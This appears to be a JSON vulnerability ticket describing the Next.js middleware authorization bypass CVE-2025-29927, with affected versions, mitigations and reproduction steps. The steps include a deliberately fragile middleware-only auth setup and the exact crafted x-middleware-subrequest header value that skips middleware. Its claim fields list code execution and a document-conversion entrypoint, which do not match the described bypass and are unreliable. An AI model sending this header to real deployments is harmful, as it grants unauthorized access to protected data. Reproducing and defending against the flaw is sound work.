{
  "claim": {
    "argus_claim_ref": null,
    "attacker_control": null,
    "claimed_surface": "library_api",
    "expected_impact": "code_execution",
    "finding_id": null,
    "id": null,
    "required_entrypoint_detail": null,
    "required_entrypoint_kind": "convert_document",
    "submission_reason": "ticket_derived",
    "trigger_class": null,
    "upstream_verdicts": null
  },
  "latest_description": "## Summary\nNext.js middleware authorization checks can be skipped when a request carries the internal `x-middleware-subrequest` header with a value that names the application's middleware, letting an attacker reach routes whose only access control lives in middleware. This affects self-hosted deployments that rely on middleware for authorization checks.\n\n## Affected Package\n- **Name:** next\n- **Ecosystem:** npm\n- **Vulnerable versions:** >=11.1.4 <12.3.5, >=13.0.0 <13.5.9, >=14.0 <14.2.25, >=15.0 <15.2.3\n- **Patched versions:** 12.3.5, 13.5.9, 14.2.25, 15.2.3\n\n## Details\nNext.js adds the internal `x-middleware-subrequest` header to requests it issues to itself so that middleware is not executed recursively. In vulnerable versions the header is honoured on any incoming request: when its value names the middleware module, the middleware runtime returns an empty response carrying `x-middleware-next`, and the request is served as if middleware had returned `NextResponse.next()`. If an application relies on middleware for authorization (e.g., validating an auth cookie or enforcing access control), an attacker can craft a request with this header to bypass those checks and reach protected pages, route handlers and API routes. Only middleware is skipped; authorization performed inside the page or route handler itself still runs.\n\nSelf-hosted Next.js applications running via `next start` (including `output: 'standalone'` builds) are affected. Deployments hosted on Vercel are automatically protected. Until the application is upgraded, strip or reject external requests carrying the `x-middleware-subrequest` header at the edge or reverse proxy in front of Next.js; patched releases no longer trust an externally supplied value. Because middleware can be skipped, it should not be the only authorization layer: re-check authorization in the route handler or server component that returns the protected data.\n\n## Reproduction Steps\n> The following demonstrates the bypass on a vulnerable version (example: 14.2.24). Adjust the version within a vulnerable range.\n\n1. **Environment setup**\n   - Install Node.js 18+ and npm.\n   - Create a Next.js app and install a vulnerable version, pinning React 18 because next@14 declares it as a peer dependency:\n     ```bash\n     npx create-next-app@latest next-mw-bypass\n     cd next-mw-bypass\n     npm install next@14.2.24 react@18 react-dom@18\n     ```\n2. **Add middleware authorization check**\n   - Create `middleware.js` in the project root (use `src/middleware.js` if the app was scaffolded with a `src/` directory):\n     ```javascript\n     import { NextResponse } from 'next/server';\n\n     // Deliberately fragile: authorization lives only in middleware.\n     export function middleware(req) {\n       const hasAuth = req.cookies.get('auth')?.value === 'ok';\n       if (!hasAuth) {\n         return new NextResponse('Unauthorized', { status: 401 });\n       }\n       return NextResponse.next();\n     }\n\n     export const config = { matcher: ['/protected'] };\n     ```\n   - Create a protected route at `app/protected/page.js` (or `pages/protected.js` for the pages router):\n     ```javascript\n     export default function Protected() {\n       return <div>secret-data</div>;\n     }\n     ```\n3. **Run the app**\n   ```bash\n   npm run build\n   npm run start\n   ```\n4. **Verify normal protection**\n   ```bash\n   curl -i http://localhost:3000/protected\n   ```\n   - Expected: `401 Unauthorized` response from middleware.\n   - Control: `curl -i -H 'x-middleware-subrequest: 1' http://localhost:3000/protected` also returns `401`, because an arbitrary value does not match the middleware name and the skip is not triggered.\n5. **Bypass middleware with the internal header**\n   The value must name the middleware module as Next.js registers it: `middleware` (or `src/middleware` when the file lives under `src/`). Repeating the name five times, colon-separated, satisfies both the plain membership check of older releases and the recursion-depth check of newer ones, so one payload covers the 13.x to 15.x range; releases before 12.2, which used `pages/_middleware.js`, need that path as the value instead.\n   ```bash\n   curl -i -H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' http://localhost:3000/protected\n   ```\n   - Expected (vulnerable): `200 OK` with `secret-data` despite the missing auth cookie.\n   - Expected (patched, 14.2.25 or later): `401 Unauthorized`, since the external header is no longer trusted.\n\n## Indicators of Success\n- Requests without the auth cookie are blocked by middleware (401), including requests whose `x-middleware-subrequest` value does not name the middleware.\n- A request whose `x-middleware-subrequest` value names the middleware skips it entirely and the protected route returns its content (200).\n\n## References\n- https://nvd.nist.gov/vuln/detail/CVE-2025-29927\n- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw\n- http://www.openwall.com/lists/oss-security/2025/03/23/3\n- https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2\n- https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48\n- https://github.com/kOaDT/poc-cve-2025-29927\n",
  "product": "npm:next",
  "severity": "critical",
  "status": "open",
  "summary": "Next.js middleware can be bypassed by supplying the internal x-middleware-subrequest header, allowing unauthorized access to protected routes in self-hosted deployments.",
  "ticket_id": "CVE-2025-29927"
}